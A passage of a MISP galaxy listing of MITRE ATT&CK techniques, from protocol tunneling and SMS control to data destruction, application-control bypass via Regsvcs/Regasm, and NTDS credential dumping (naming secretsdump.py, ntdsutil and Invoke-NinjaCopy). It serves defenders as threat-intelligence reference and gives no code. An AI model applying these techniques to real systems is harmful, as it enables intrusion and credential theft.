https://attack.mitre.org/techniques/T1562

Protocol Tunneling - T1572

Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.

There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)

[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19)

Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure.

The tag is: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572"

Table 3937. Table References
Links
https://attack.mitre.org/techniques/T1572
https://www.ssh.com/ssh/tunneling
https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

SMS Control - T1582

Adversaries may delete, alter, or send SMS messages without user authorization. This could be used to hide C2 SMS messages, spread malware, or various external effects.

This can be accomplished by requesting the RECEIVE_SMS or SEND_SMS permissions depending on what the malware is attempting to do. If the app is set as the default SMS handler on the device, the SMS_DELIVER broadcast intent can be registered, which allows the app to write to the SMS content provider. The content provider directly modifies the messaging database on the device, which could allow malicious applications with this ability to insert, modify, or delete arbitrary messages on the device.(Citation: SMS KitKat)(Citation: Android SmsProvider)

The tag is: misp-galaxy:mitre-attack-pattern="SMS Control - T1582"

Table 3938. Table References
Links
https://attack.mitre.org/techniques/T1582
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-41.html
https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html
https://android.googlesource.com/platform/packages/providers/TelephonyProvider//7e7c274/src/com/android/providers/telephony/SmsProvider.java[https://android.googlesource.com/platform/packages/providers/TelephonyProvider//7e7c274/src/com/android/providers/telephony/SmsProvider.java]

Dumpster dive - T1286

Dumpster diving is looking through waste for information on technology, people, and/or organizational items of interest. (Citation: FriedDumpsters)

The tag is: misp-galaxy:mitre-attack-pattern="Dumpster dive - T1286"

Table 3939. Table References
Links
https://attack.mitre.org/techniques/T1286

Dynamic DNS - T1333

Dynamic DNS is a automated method to rapidly update the domain name system mapping of hostnames to IPs. (Citation: FireEyeSupplyChain)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1333"

View relationships graph

Dynamic DNS - T1333 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1311" with estimative-language:likelihood-probability="almost-certain"

Table 3940. Table References
Links
https://attack.mitre.org/techniques/T1333

Port redirector - T1363

Redirecting a communication request from one address and port number combination to another. May be set up to obfuscate the final location of communications that will occur in later stages of an attack. (Citation: SecureWorks HTRAN Analysis)

The tag is: misp-galaxy:mitre-attack-pattern="Port redirector - T1363"

Table 3941. Table References
Links
https://attack.mitre.org/techniques/T1363

Internal Spearphishing - T1534

Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user’s device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)

Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.

There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)

The tag is: misp-galaxy:mitre-attack-pattern="Internal Spearphishing - T1534"

Table 3942. Table References
Links
https://attack.mitre.org/techniques/T1534
https://blog.trendmicro.com/phishing-starts-inside/
https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6

Credential pharming - T1374

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Credential pharming a form of attack designed to steal users' credential by redirecting users to fraudulent websites. Pharming can be conducted either by changing the hosts file on a victim’s computer or by exploitation of a vulnerability in DNS server software. (Citation: DriveByPharming) (Citation: GoogleDrive Phishing)

The tag is: misp-galaxy:mitre-attack-pattern="Credential pharming - T1374"

Table 3943. Table References
Links
https://attack.mitre.org/techniques/T1374

Encrypted Channel - T1573

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573"

Table 3944. Table References
Links
https://attack.mitre.org/techniques/T1573
http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840
https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Acquire Infrastructure - T1583

Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

The tag is: misp-galaxy:mitre-attack-pattern="Acquire Infrastructure - T1583"

Table 3945. Table References
Links
https://attack.mitre.org/techniques/T1583
https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
https://threatconnect.com/blog/infrastructure-research-hunting/
https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

Device Lockout - T1446

An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment.

On Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode to prevent the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword)

On iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode, they cannot set a new passcode. However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)

The tag is: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446"

Table 3946. Table References
Links
https://attack.mitre.org/techniques/T1446
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html
https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)
http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/

Hide Artifacts - T1564

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)

Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564"

Table 3947. Table References
Links
https://attack.mitre.org/techniques/T1564
https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

Compromise Infrastructure - T1584

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.

Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584"

Table 3948. Table References
Links
https://attack.mitre.org/techniques/T1584
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
https://www.icann.org/groups/ssac/documents/sac-007-en
https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html
https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf
https://threatconnect.com/blog/infrastructure-research-hunting/
https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

Data Destruction - T1485

Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk’s logical structure.

Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).

In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)

The tag is: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485"

Table 3949. Table References
Links
https://attack.mitre.org/techniques/T1485
https://www.symantec.com/connect/blogs/shamoon-attacks
https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html
http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf
https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/
https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network

Firmware Corruption - T1495

Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.

The tag is: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495"

Table 3950. Table References
Links
https://attack.mitre.org/techniques/T1495
https://www.symantec.com/security-center/writeup/2000-122010-2655-99
http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research

Resource Hijacking - T1496

Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability.

One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)

Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)

The tag is: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496"

Table 3951. Table References
Links
https://attack.mitre.org/techniques/T1496
https://securelist.com/lazarus-under-the-hood/77908/
https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc
https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html

Service Stop - T1489

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary’s overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)

Adversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)

The tag is: misp-galaxy:mitre-attack-pattern="Service Stop - T1489"

Table 3952. Table References
Links
https://attack.mitre.org/techniques/T1489
https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
https://www.secureworks.com/research/wcry-ransomware-analysis

Data Manipulation - T1565

Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565"

Table 3953. Table References
Links
https://attack.mitre.org/techniques/T1565

Native Code - T1575

Adversaries may use Android’s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.

The NDK allows developers to write native code in C or C++ that is compiled directly to machine code, avoiding all intermediate languages and steps in compilation that higher level languages, like Java, typically have. The Java Native Interface (JNI) is the component that allows Java functions in the Android app to call functions in a native library.(Citation: Google NDK Getting Started)

Adversaries may also choose to use native functions to execute malicious code since native actions are typically much more difficult to analyze than standard, non-native behaviors.(Citation: MITRE App Vetting Effectiveness)

The tag is: misp-galaxy:mitre-attack-pattern="Native Code - T1575"

Table 3954. Table References
Links
https://attack.mitre.org/techniques/T1575
https://developer.android.com/ndk/guides
https://www.mitre.org/sites/default/files/publications/pr-16-4772-analyzing-effectiveness-mobile-app-vetting-tools-report.pdf

Establish Accounts - T1585

Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)

For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)

Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Establish Accounts - T1585"

Table 3955. Table References
Links
https://attack.mitre.org/techniques/T1585
https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Active Scanning - T1595

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Active Scanning - T1595"

Table 3956. Table References
Links
https://attack.mitre.org/techniques/T1595
https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
https://wiki.owasp.org/index.php/OAT-004_Fingerprinting

Compromise Accounts - T1586

Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Accounts - T1586"

Table 3957. Table References
Links
https://attack.mitre.org/techniques/T1586
https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

Dynamic Resolution - T1568

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware’s communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568"

Table 3958. Table References
Links
https://attack.mitre.org/techniques/T1568
http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

System Services - T1569

Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.

The tag is: misp-galaxy:mitre-attack-pattern="System Services - T1569"

Table 3959. Table References
Links
https://attack.mitre.org/techniques/T1569

Develop Capabilities - T1587

Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)

As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.

The tag is: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587"

Table 3960. Table References
Links
https://attack.mitre.org/techniques/T1587
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Obtain Capabilities - T1588

Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.

In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)

In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain Capabilities - T1588"

Table 3961. Table References
Links
https://attack.mitre.org/techniques/T1588
https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
https://www.recordedfuture.com/cobalt-strike-servers/

Adversary-in-the-Middle - T1557

Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)

Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.

The tag is: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557"

Table 3962. Table References
Links
https://attack.mitre.org/techniques/T1557
https://capec.mitre.org/data/definitions/94.html
https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/

Add-ins - T1137.006

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)

Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.

The tag is: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006"

Table 3963. Table References
Links
https://attack.mitre.org/techniques/T1137/006
https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique

Regsvcs/Regasm - T1218.009

Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)

Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009"

Table 3964. Table References
Links
https://attack.mitre.org/techniques/T1218/009
https://msdn.microsoft.com/en-us/library/04za0hca.aspx
https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx
https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
https://lolbas-project.github.io/lolbas/Binaries/Regasm/

Steganography - T1001.002

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.

The tag is: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002"

Table 3965. Table References
Links
https://attack.mitre.org/techniques/T1001/002
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

NTDS - T1003.003

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)

In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)

The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.

Volume Shadow Copy
secretsdump.py
Using the in-built Windows tool, ntdsutil.exe
Invoke-NinjaCopy

The tag is: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003"

Table 3966. Table References
Links
https://attack.mitre.org/techniques/T1003/003
https://en.wikipedia.org/wiki/Active_Directory
http://adsecurity.org/?p=1275

DCSync - T1003.006

